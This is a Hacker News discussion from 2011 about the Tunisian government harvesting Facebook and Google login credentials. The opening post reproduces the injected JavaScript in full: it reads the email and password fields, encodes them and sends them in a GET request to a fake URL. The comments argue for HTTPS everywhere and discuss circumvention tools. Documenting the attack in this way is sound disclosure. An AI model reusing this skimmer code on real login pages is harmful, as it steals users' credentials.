

Http://www.google.com/wo0dh3ad - SimplePast

This is the function used by Tunisia Gov agencies to  harvest login/passwords :
see also http://www.thetechherald.com/article.php/201101/6651<p>&#60;script language="javascript"&#62;
&#60;!--
function h6h(st){var st2="";for(i=0;i&#60;st.length;i++){c=st.charCodeAt(i);ch=(c&#38;0xF0)&#62;&#62;4;cl=c&#38;0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i&#60;len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {var frm = document.getElementById("gaia_loginform"); var us3r = frm.Email.value; var pa55 = frm.Passwd.value;
 var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&#38;u="+h6h(us3r)+"&#38;p="+h6h(pa55);
 var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}
//--&#62;<p>&#60;/script&#62;
======
mike-cardwell
This is why login forms themselves must be opened over an HTTPS connection.
Displaying a login form over HTTP which POSTs to HTTPS is easily MITMd.

Think of your users. Some of them will be accessing your sites from oppressive
regimes. Let them do so safely.

Taking Facebook as an example, considering how global their usage is, and the
amount of sensitive data peoples accounts contain, it's unforgivable that they
don't force HTTPS traffic for everything.

~~~
saurik
Unfortunately, that is easily defeated by modifying all non-SSL pages on the
site to link to a non-SSL login page look-alike (which is easily generated by
downloading the real one over SSL and forwarding it decrypted). I don't see
any reasonable way to solve this other than /always/ using SSL for your site.

------
thamer
Slim Amamou, who is named in the article as the on who discovered this code,
has been arrested. His phone is still updating his Google Latitude position,
moving between several government buildings.

[http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-
bl...](http://advocacy.globalvoicesonline.org/2011/01/07/tunisia-blogger-slim-
amamou-arrested-today/)

------
bensummers
Story behind this: [http://cpj.org/internet/2011/01/tunisia-invades-censors-
face...](http://cpj.org/internet/2011/01/tunisia-invades-censors-facebook-
other-accounts.php)

------
Jabbles
_Fortunately, because the fake "wo0dh3ad" page accessed was on their site,
Facebook may well have a log of everyone whose account was compromised and can
take steps to warn and protect their Tunisian users._

Why would the Tunisian government have allowed ISPs to forward these requests?
Facebook probably knows nothing about this.

------
wladimir
Proves again, there is really no excuse not to use HTTPS for everything.

Encryption/certificate validation make it much harder to pull of a MITM attack
like this, especially by companies and small repressive governments.

~~~
iuguy
The simple answer for small repressive governments is to block the HTTPS login
form so you have to fall back to HTTP. ATI has complete control of all
Internet access in Tunisia. You're just not going to get through them unless
you can find a way through.

In some countries I work in we routinely come across censorship and all kinds
of dodgy goings on, so we have a variety of tunnelling methods (VPN, SSH,
ICMPTX, DNSTX, Tor and a few non-public tunnelling options). For the most part
as long as you can terminate a connection in somewhere you're fairly
comfortable with you're better off.

Also don't make the mistake of feeling that the US, UK or EU are automatically
comfortable options. It all depends what you're doing with the data. A little
common sense goes a long way.

~~~
wladimir
Of course, governments can completely block port 443, but that will make so
many internet sites unusable they could just as well completely pull the plug.

And with 'HTTPS everywhere', I also mean removing the HTTP fallback. Fallbacks
to plaintext (that can be triggered by a MITM) are indeed obvious backdoors
that should be avoided in any protocol.

------
pavel_lishin
So, is pornography actually illegal in Tunisia, or is this a case of "Well, we
just don't like it when you do it."?

~~~
eli
I'm not sure there's a big distinction under an authoritarian regime

